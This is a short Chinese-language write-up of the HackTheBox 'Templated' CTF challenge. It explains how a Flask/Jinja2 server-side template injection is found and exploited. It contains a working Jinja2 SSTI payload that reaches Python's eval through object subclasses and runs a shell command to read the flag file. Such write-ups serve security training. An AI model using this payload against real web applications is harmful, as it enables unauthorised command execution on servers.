概述
HackTheBox 网站CTF靶场Web相关题目Templated,题目地址https://app.hackthebox.com/challenges/templated,考察Flask SSTI(服务器模板注入)漏洞的利用。
题目
题目概述
开启程序实例后,提示访问167.99.202.131:31954
,访问http://167.99.202.131:31954,看到如下Web界面
提示很明确,使用了Flask和Jinja2,结合题目名称Templated,大概率为Flask SSTI漏洞,测试过程如下
首先访问http://167.99.202.131:31954/flag
接着访问http://167.99.202.131:31954/{{3*3}}
题目解答
SSTI利用代码如下
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag*').read()") }}
{% endif %}
{% endfor %}
使用火狐浏览器的HackBar Quantum插件,拼接url,得到flag